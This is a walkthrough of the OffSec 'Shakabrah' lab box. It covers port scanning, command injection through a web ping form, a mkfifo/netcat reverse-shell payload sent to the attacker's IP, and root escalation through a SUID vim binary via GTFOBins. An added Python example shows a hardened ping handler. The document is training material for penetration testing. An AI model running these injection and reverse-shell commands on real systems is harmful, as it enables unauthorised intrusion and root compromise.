Shakabrah Walkthrough OffSec


In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide covers the essential stages from reconnaissance to privilege escalation, providing a clear path to capturing the flags.


Rustscan: identify open ports and services.

rustscan -a 192.168.158.86 -- -A


HTTP Service: Explore the website manually.

Directory Bruteforcing: discover hidden directories.

gobuster dir -u https://192.168.158.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

From here, we can attempt to gain RCE by exploring the interface's capabilities. Instead of fuzzing to discover which commands we can execute—though that is a valuable exercise on its own—we can manually investigate. Specifically, we should determine if it allows command chaining.

ping 192.168.158.86;

ping 192.168.158.86;cat /etc/passwd
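To make the weakness concrete from the defender's side, here is an added Python example (not code from the box or from OffSec) contrasting a ping handler that splices the request parameter into a shell string with one that allow-lists a literal IP address and runs ping without a shell. The function names and the IP-only policy are my own assumptions.

```python
import ipaddress
import subprocess

# Characters a shell treats as command separators or substitutions.
SHELL_METACHARACTERS = set(";|&`$()<>\n")


def build_ping_command_vulnerable(target: str) -> str:
    """Vulnerable pattern: the parameter is spliced straight into a shell
    command line, so a ';' or '|' in `target` starts a second command."""
    return f"ping -c 1 {target}"


def contains_shell_metacharacters(value: str) -> bool:
    """Detection helper: flag a parameter that could chain or substitute
    commands (usable as a WAF rule or when scanning access logs)."""
    return any(ch in SHELL_METACHARACTERS for ch in value)


def validate_target(target: str) -> str:
    """Allow-list the input: only a literal IPv4/IPv6 address is accepted.
    Anything else, hostnames included (assumed policy), raises ValueError."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"rejected ping target: {target!r}") from None


def build_ping_command_safe(target: str) -> list:
    """Hardened pattern: the validated value is one argv element."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Execute with shell=False so metacharacters are never interpreted."""
    return subprocess.run(
        build_ping_command_safe(target),
        capture_output=True, text=True, timeout=timeout, check=False,
    )


if __name__ == "__main__":
    # Constructed sample inputs: a plain address and the chaining probe above.
    for sample in ("192.168.158.86", "192.168.158.86;cat /etc/passwd"):
        flag = "flagged" if contains_shell_metacharacters(sample) else "clean"
        print(repr(sample), flag)
        try:
            print("  argv:", build_ping_command_safe(sample))
        except ValueError as exc:
            print("  ", exc)
```

If the application must accept hostnames, replace the ipaddress check with a strict allow-list regex rather than trying to deny individual metacharacters.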




Now we will try to get RCE using this command injection vulnerability.


Reverse shell payload:

192.168.158.86;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.232 80 >/tmp/f

We get our shell back and now have access as www-data.

This payload is taken from https://www.revshells.com/.

Change the directory to /home/dylan, where you'll find a file named local.txt. Use the cat command to read the file and obtain your first flag.


Privilege Escalation:

find / -type f -perm -u=s 2>/dev/null

Here, it shows that vim.basic has the SUID bit set. By checking GTFOBins, we find several exploitation methods. Here is the one I used:

Run /usr/bin/vim.basic and enter the following in the editor:

:py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")


Change directory to /root, where you'll find proof.txt; simply cat proof.txt to get your root flag.




Great article! Very insightful for both beginners and experienced pen testers. Thanks for sharing! #CyberSecurity #PenTesting #CTF
